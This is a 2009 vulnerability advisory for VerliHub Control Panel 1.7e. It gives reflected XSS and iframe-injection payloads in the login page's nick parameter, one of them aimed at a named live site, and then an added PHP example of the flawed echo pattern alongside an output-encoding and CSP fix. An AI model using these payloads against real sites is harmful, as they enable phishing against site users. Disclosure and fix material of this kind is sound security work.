VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

http://vhcp.verlihub-project.org

-6-05-2009

-Methodman - http://nemesis.te-home.net

-Example:-

Cross-site scripting vulnerability in the nick parameter of the login page:

http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>


http://vhcp.com/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>


-Proof of Concept:-

http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>


http://wiretransfers.net/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>


-Nice screen:-

http://img7.imageshack.us/img7/4660/vhcp.jpg

This vulnerability can be used to perform phishing attacks.

[so verlibug sucks++++ =))]

/teamelite 2009
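
-Fix pattern (added example):-

The block below is an added illustration, not VerliHub Control Panel source code. It assumes the login form echoes the nick parameter into an HTML attribute, and contrasts that unsafe pattern with output encoding; the function names are hypothetical.

```php
<?php
// Added illustration; not VerliHub Control Panel source code.
// Assumption: the login form echoes the `nick` query parameter into an
// HTML attribute, which is what the `">` prefix in the advisory implies.

// Unsafe pattern: request data concatenated into markup unchanged.
function render_nick_unsafe(string $nick): string
{
    return '<input type="text" name="nick" value="' . $nick . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function render_nick_safe(string $nick): string
{
    $encoded = htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="nick" value="' . $encoded . '">';
}

// Defence in depth: a response header that stops inline script and
// framed content from loading even if an encoding call is missed.
function csp_header(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; frame-src 'none'";
}

// The two `nick` values from the advisory, used as test input.
$samples = [
    '"><script>alert("Vulnerable");</script>',
    '"><iframe src=http://nemesis.te-home.net/index.html?news></iframe>',
];

foreach ($samples as $nick) {
    $unsafe = render_nick_unsafe($nick);
    $safe   = render_nick_safe($nick);
    // Unsafe output: the attribute is closed early and a new element follows.
    // Safe output: the whole value stays inside the attribute as text.
    echo "unsafe: $unsafe\n";
    echo "safe:   $safe\n";
    $raw = strpos($safe, '<script') !== false || strpos($safe, '<iframe') !== false;
    echo 'raw tag in safe output: ', ($raw ? 'yes' : 'no'), "\n\n";
}
echo csp_header(), "\n";
```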